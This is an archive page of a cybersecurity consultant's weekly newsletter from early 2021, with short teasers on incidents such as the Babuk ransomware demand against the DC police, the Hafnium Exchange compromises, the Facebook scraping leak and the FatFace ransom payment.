I’m Robin, founder of Cydea, the positive cyber security consultancy, and previously led BAE Systems’ Security Advisory & Technical Services business, recognised by Forrester as one of the leading information security consultancies.
I help businesses defend themselves from cyber crime and thrive in the digital world and have over fifteen years experience including advising numerous boards on how to manage crises resulting from cyber-attack.
If you’re interested in improving how you manage your cyber risk, or need help governing information security at the board level, then get in touch with me via Cydea, or connect on LinkedIn or Twitter.
Babuk ransomware operators demand $50M from DC police. BoJo's phone number available online. Emotet deactivated. And, burrowing beavers.
Vol. 4 Iss. 18 02/05/2021 Robin Oldham
This week Babuk ransomware attack on D.C. Police The Metropolitan Police Department (MPD) received an ultimatum from the Babuk ransomware group this week: pay us $50 million or we will release the details of confidential informants to criminal gangs. MPD is the police force of Washington D.C. and represents an audacious target for a ransomware operator. It’s hard to see a situation where a police force would capitulate with the demands.Read more… ( ~6 Min.)
Ransomware in Apple's supply chain. Facebook seeks to 'normalise' scraping. The balkanisation of the Internet has intelligence agencies worried. Cellebrite's iPhone unlocking system is full of vulnerabilities.
Vol. 4 Iss. 17 25/04/2021, last updated 30/04/2021 Robin Oldham
This week Quanta ransomware attack and questions to ask of supply chain security Quanta Computer, a Taiwanese tech manufacturer has recently become a victim of the REvil ransomware group. The reason behind their targeting offers a glimpse at how ransomware groups are evolving their tactics. Supply chains have been the security theme-de-jour since the Solarwinds attack in December 2020. That hasn’t escaped enterprise cyber-criminals either. While big brands like Apple may spend significant budgets on securing their networks, those of their suppliers may not be afforded the same luxury.Read more… ( ~9 Min.)
FBI gets a warrant to fix Hafnium web shells, becomes an MSSP. Sanctions for Russia over SolarWinds. Plus you cheddar believe there are some cheese puns.
Vol. 4 Iss. 16 18/04/2021 Robin Oldham
This week FBI gets warrant, modifies victims Exchange servers to remove web shells, becomes MSSP This week the United States Federal Bureau of Investigation (FBI) cleaned up ‘hundreds’ of Microsoft Exchange servers that had been compromised by attackers exploiting the Hafnium vulnerabilities (vol. 4, iss. 10). The FBI had obtained a court order allowing them to do so and only removed the attacker’s web shells (the servers will still be unpatched).Read more… ( ~6 Min.)
Facebook's *ahem* 'data scraping' incident sets the stage for debate on responsible design and engineering. AWS bomb threat. Censorship by QoS. TUI's algorithm gender bias led to 'serious incident' calculating takeoff loads.
Vol. 4 Iss. 15 11/04/2021 Robin Oldham
This week Facebook data breach, sorry, ‘data scraping’ incident Facebook fanned the flames of critics this week with their response to the details of 533 million users being posted publicly online. The data includes full name, email, telephone, date of birth and location, and counts 30 million American and 11 million UK Facebook users. You can check if your data is present by searching for your email or phone number at haveibeenpwned.Read more… ( ~8 Min.)
The long-tail of ransomware recovery. PHP source code compromise. Exploiting 'safe' file formats. Risk margins and early risk management decisions.
Vol. 4 Iss. 14 04/04/2021, last updated 02/05/2021 Robin Oldham
This week Sepa, CompuCom ransomware attacks show the long tail of disruptive cyber-attacks Interesting write-up of the impact of a ransomware attack on the Scottish Environment Protection Agency (Sepa) by BBC News. The environmental regulator was the victim of a double-extortion ransomware attack on Christmas Eve 2020. Their data was subsequently released online when they refused to pay the ransom. “Over 70% of staff will be back online [by Easter]” according to Sepa chief exec Terry A’Hearn.Read more… ( ~5 Min.)
FatFace IR comms 'confidential' while loosing 200GB data. Cyber insurer CNA may have been targeted for policy info. OSINT on the Ever Given.
Vol. 4 Iss. 13 28/03/2021 Robin Oldham
This week FatFace’s lesson in how not to handle a cyber crisis U.K. clothing retailer FatFace reportedly paid a £1.9 million ($2.65M) ransom to cybercriminals following a double-extortion attack that saw both customer and employee data stolen. Customers’ name, email and postal address, and the last four digits of their credit card were taken, while employees’ bank and national insurance details exposed. The negotiations between FatFace and the Conti ransomware gang have been published by Computer Weekly and provides insight into the negotiations.Read more… ( ~6 Min.)
Rerouting a victims SMS for $16. UK defence review: nuclear response for cyber attack. Who is buying all the data generated by your car?
Vol. 4 Iss. 12 21/03/2021, last updated 28/03/2021 Robin Oldham
This week I founded Cydea with a mission to bring positive security to the world and have always known that supporting charities - who hold large amounts of (sensitive) data - was going to be an important part of that. So I’m feeling really proud this week to be making that commitment publicly: both in the form of pro-bono consulting, and grants for the purchase of security hardware, software and services.Read more… ( ~7 Min.)
Criminals jump on Hafnium/ProxyLogon. Hacktivists breach Verkada's 150K facial recognition cams. Apple's IP theft lawsuit. Google's Spectre exploit.
Vol. 4 Iss. 11 14/03/2021 Robin Oldham
This week There are lots of security advisories that focus on technical information (TTPs, IOCs and other TLAs) but don’t often come across those that look from a business risk perspective. Something that is for senior management, to aid their understanding of current events and the cyber risk posed to their organisations. So this week Cydea issued our first ”Risk Advisory” for Microsoft Exchange and the “Hafnium” / “ProxyLogon” vulnerability. We take a look at the evolving sources of risk and the potential business consequences and I’d love to hear your feedback.Read more… ( ~7 Min.)
Hafnium mass-exploitation of Microsoft Exchange servers. Google, Alliaz and MunichRe team up on cloud cyber insurance. Bitflipping may be more common than you think.
Vol. 4 Iss. 10 07/03/2021, last updated 14/03/2021 Robin Oldham
This week Over 30,000 U.S. organisations compromised by flaws in Microsoft Exchange mail server It’s been a bad week to be a Microsoft Exchange server admin as it came to light that four vulnerabilities in Outlook Web Access had been chained together and exploited by a suspected Chinese-affiliated group - dubbed Hafnium - for espionage purposes. Over 100,000 servers are believed to have been compromised worldwide. Targets include “infectious disease researchers, law firms, higher education institutions, defence contractors, policy think tanks, and NGOs.Read more… ( ~6 Min.)
IABs charge just $7,100 for access to victims networks. Accellion file transfer appliances popped left, right, centre. Former SolarWinds CEO says it is all the interns fault.
Vol. 4 Iss. 9 28/02/2021 Robin Oldham
This week Initial Access Brokers (IABs) and the evolving economics of cybercrime Interesting research from the folks at Digital Shadows into the rise of what they have dubbed ‘Initial Access Brokers’ (IABs). These groups spend their time attempting to gain access to organisations and then sell this proven access to other cyber threat actors. IABs are closely linked with the rise of ransomware operations that are largely now manual operations design to inflict maximum pressure on a victim.Read more… ( ~5 Min.)